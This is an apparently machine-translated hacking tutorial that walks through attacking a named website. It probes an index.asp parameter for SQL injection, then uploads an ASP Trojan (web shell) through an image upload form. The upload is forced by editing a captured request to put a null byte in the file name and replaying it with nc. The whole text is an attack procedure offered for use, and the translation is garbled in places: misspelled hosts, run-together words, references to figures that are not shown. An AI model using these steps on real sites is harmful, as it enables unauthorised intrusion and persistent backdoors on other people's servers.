Browse the structure of this website and find the http://www.fzz8.cn/index.asp? Id = 14 such an interface, add a single quotation mark http://www.fzz8.cn/index.asp behind? Id = 14' after you press enter (figure 1)
The SQL injection vulnerability exists without single quotes. My idea is that the SQL injection vulnerability is obtained to the website administrator's account, and then an ASP Trojan is uploaded. Use a tool to go to the background and try again, check whether there are any vulnerabilities. As expected, I found an image upload interface, for example (figure 2)
Check the source code and find that the upload vulnerability exists. The 6 kbbs Upload Vulnerability in the previous days is similar to the filepath variable issue. (3)
Next, upload the ASP Trojan. Select the ASP Trojan to be uploaded, but do not click the upload button (4 ).
Then perform wsockexper packet capture, (5)
Go back to IE to upload the file. After clicking the "Upload" button, an error is prompted, indicating that the file upload is incorrect and the file format is incorrect, this is expected (it is strange that the upload is successful ).
Go back to the packet capture software and check the packet capture results. wsockexper recorded all the submission processes I just submitted (figure 6)
Copy Lines 3 and 4 to a text file. Note that press ENTER should also be copied. Save as 2.txt (Figure 7)
Next we will modify this file. change the file name and find filename = "D: \ documentsand Settings \ Administrator \ Desktop \ Wenzhang \ shadow. ASP ", change the suffix of the ASP file to the image format, (8) Add the file name to be saved after the directory to be uploaded, and then leave a space behind the file name, (9)
Now, extract ultraedit-32, open 2.txt, find the/upload/shadow. asp string, click Edit --> hex function --> hex EDIT: convert the hexadecimal format corresponding to the space before OD.CodeChange 20 to 00 (figure 10) and save and exit. The data we need becomes.
The following is the submission.
Open cmd, enter the NC directory, and use NC to submit our data with the following command:
NC www.traget.com 80 <2.txt
Soon the submitted information will be returned, telling us "the software has been uploaded successfully !" And tell us the path and file name of the software: "upload/shadow. asp ". (Figure 11)
What are you waiting for? Let's go to IE and see if our ASP files have been uploaded? Open http://www.trget.com.cn/upload/shadow.aspin in IE. See Figure 12. What kind of ASP backdoors can't be uploaded with it? Most people know the cause of the vulnerability, so many websites have fixed this vulnerability, but for file names, someProgramBut it is not considered.